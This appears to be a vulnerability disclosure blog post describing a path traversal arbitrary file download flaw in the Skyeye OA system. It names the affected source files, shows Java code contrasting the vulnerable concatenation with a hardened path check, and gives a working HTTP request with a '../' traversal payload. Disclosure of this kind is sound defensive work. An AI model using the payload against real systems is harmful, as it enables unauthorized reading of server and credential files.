Skyeye has an arbitrary file download vulnerability

Product Introduction

Skyeye Cloud-Intelligent Office OA System [SpringBoot2-Rapid Development Platform] is designed for management in institutions such as hospitals, schools, and small-to-medium enterprises. It integrates diverse advanced functionalities including online file operations, log management, attendance tracking, CRM, ERP inventory management, project management, drag-and-drop questionnaire builder, scheduling, note-taking, task planning, administrative functions, and other complex business processes.

Vulnerability Analysis

\skyeye\skyeye-promote\skyeye-code-doc\src\main\java\com\skyeye\eve\controller\CodeModelHistoryController.java

\skyeye\skyeye-promote\skyeye-code-doc\src\main\java\com\skyeye\eve\service\impl\CodeModelHistoryServiceImpl.java

After receiving the filePath parameter submitted by the user, the system applies no security filtering (such as path normalization or blacklist validation). Instead, it concatenates the parameter directly onto the base directory path as a string and serves the file found at the resulting full path. Because the user input is never validated, an attacker can craft a parameter containing path traversal sequences (e.g., ../../etc/passwd) to download arbitrary files from the server.
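As an added illustration (not Skyeye's own code), the concatenation pattern described above is shown next to a hardened resolver for the same download step; BASE_DIR, resolveDownload and resolveDownloadSafely are hypothetical names, and the payload string is the one from the request below.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;

public class DownloadPathCheck {

    // Hypothetical base directory of the generated-code download area.
    private static final Path BASE_DIR = Paths.get("/opt/skyeye/codemodel").toAbsolutePath();

    // Vulnerable pattern: string concatenation, no normalization, no containment check.
    public static Path resolveDownload(String filePath) {
        // "../../../../../Windows/win.ini" simply walks out of BASE_DIR.
        return Paths.get(BASE_DIR.toString() + "/" + filePath);
    }

    // Hardened: normalize the candidate and require it to stay inside BASE_DIR.
    // Returns null when the request would leave the download area.
    public static Path resolveDownloadSafely(String filePath) throws IOException {
        if (filePath == null || filePath.isEmpty() || filePath.indexOf('\0') >= 0) {
            return null;
        }
        // resolve() discards BASE_DIR when the argument is absolute or rooted, so reject those.
        Path candidate = Paths.get(filePath);
        if (candidate.isAbsolute() || candidate.getRoot() != null) {
            return null;
        }
        Path normalized = BASE_DIR.resolve(candidate).normalize();
        if (!normalized.startsWith(BASE_DIR)) {
            return null; // ../../etc/passwd and the win.ini payload end up here
        }
        // If the target exists, also follow symlinks so a link inside BASE_DIR
        // cannot point back outside it.
        if (Files.exists(normalized)) {
            Path real = normalized.toRealPath();
            if (!real.startsWith(BASE_DIR.toRealPath())) {
                return null;
            }
        }
        return normalized;
    }

    public static void main(String[] args) throws IOException {
        String payload = "../../../../../Windows/win.ini";
        System.out.println("vulnerable: " + resolveDownload(payload).normalize());
        System.out.println("hardened:   " + resolveDownloadSafely(payload));          // null
        System.out.println("hardened:   " + resolveDownloadSafely("gen/Demo.java"));
    }
}
```

Path.startsWith compares whole path components, so a sibling directory such as BASE_DIR + "2" does not pass the containment check either.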

Vulnerability Reproduction

Configuration templates and code generation options can be freely entered. After clicking “Download,” intercept the network traffic (e.g., with a packet capture tool), change the filePath parameter to include path traversal sequences (e.g., ../../etc/passwd), and the server returns the requested file, allowing arbitrary file downloads.

Payload

GET /dev/reqBase/codemodel017?filePath=../../../../../Windows/win.ini HTTP/1.1
Host:
Connection: keep-alive
sec-ch-ua: "Not(A:Brand";v="99", "Google Chrome";v="133", "Chromium";v="133"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://119.91.201.97:8088/
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: HttpOnly

http://backk0m.github.io/2025/04/13/Skyeye/
Author: Backk0m
Published on April 13, 2025